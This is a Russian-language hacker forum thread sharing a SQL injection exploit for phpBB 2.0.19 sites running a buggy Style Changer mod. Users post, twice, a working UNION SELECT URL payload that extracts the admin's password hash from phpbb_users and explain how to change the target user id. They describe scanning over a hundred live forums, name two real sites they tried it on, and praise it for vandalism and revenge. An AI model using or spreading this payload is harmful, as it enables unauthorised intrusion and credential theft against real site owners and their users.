Форумы phpBB 2.0.19 Exploit

Dron-anarchy походу тока на 19!а жаль)))

 

ну а вам какая разница нах?=)) тем более на многих стоит 19)) да действительно там ошыпка имхо могли бы и из линка взять тоже мине ) и за репу многим спасиБо+)

 

сорри скиньте в пм линк на бажный форум, для теста...

 

Code:

index.php?s=-99%20UNION%20SELECT%20null,user_password,null,null  ,null,null,null,null,null,null,null,null,null,null  ,null,null,null,null,null,null,null,null,null,null  ,null,null,null,null,null,null,null,null,null,null  ,null,null,null,null,null,null,null,null,null%20FROM%20phpbb_users%20Where%20user_id=2/*

Вот это вручную!!!

 

причём, уберите пробелы лишние в запросе, когда писать его будете! Fr Om - это From! =)

 

все разобрался спасибо, но форумов маловато =(

 

За сплойт спасибки ручками юзается на отлично :d
Только реально я нарыл токо пару форумов которые ломаются а остальные никак!

 

Inferno - Значит версии Другии =)) Рузами всегда хорошо работаеться =)) Чем бажными Скриптами =))

 

m0nzt3r спасибо за исправление ошибки)

 

Это не работает на стандартном 2.0.19 Только с бажной модификацией. Это уязвимость не версии форума а мода. А дырявые моды для phpbb есть и другие. Фотоальбом Коппермайна например (тоже не обновленный) и др. Но это всё редко встречается

 

Реально я уже перерыл больше сотни и токо на 2х работает эта бага!

 

Это я слепой или ты ????
где ты здесь мод увидел ????

Может быть разные релизы phpBB 2.0.19 к примеру там за другой месяц или ещё что-то там но никак не уязвимость модов....

У меня трёт аж на ура....

 

Редкая кнешна бага, но всё ж работает. Молоца.

 

не я

А в сплоите по-русски написано:
phpBB Style Changer/Demo Mod-->GET HASH EXPLOIT
Вот он и работает только там, где этот стайл ченджер установлен

 

Врубился уже.
Мало где это стоит=(

 

Попробывал , с исправлением сплойта от K1borg'а , пишет
[+]Make Connection
[+]Connected
[+]User id: 2
[+]Md5 Hash: пусто .
Почему может быть ? Пробую на http://forum.sfaction.net , или на http://allgsm.com.ru/forum/ , не на одном не прет .

 

Ну тебе же русским языком объяснили и разжевали, что сплоит работает на форумах где стоит бажный мод Style Changer\Viewer
Для справки: этот мод позволяет менять скин для форума прямо с главной страницы не заходя в настройки профиля.

А вообще, как уже предлагали выше, пользуйся вручную

HTML:

http://somesite/someforum/index.php?s=-99%20UNION%20SELECT%20null,user_password,null,null%20%20%20%20,null,null,null,null,null,null,null,null,null,null%20%20%20%20,null,null,null,null,null,null,null,null,null,null%20%20%20%20,null,null,null,null,null,null,null,null,null,null%20%20%20%20,null,null,null,null,null,null,null,null,null%20FROM%20phpbb_users%20Where%20user_id=2/*

Где последняя цифра в коде - это Id пользователя, сейчас там стоит 2

Так что enjoy

 

Блин жаль что не везде работает! Покачто ещё не 1 форума не нашёл где стоит эта шляпа!

 

Да уж не самый удачный сплойт для пхпбб,кста вышла новая пага-всем СМОТРЕТЬ
Думаю,что для неприятельского форума самое,то.Да и дырка будет еше долго жить)

 

Интересный сплойт. Но только для вандализма =(.
Кроме мести ничего интересного.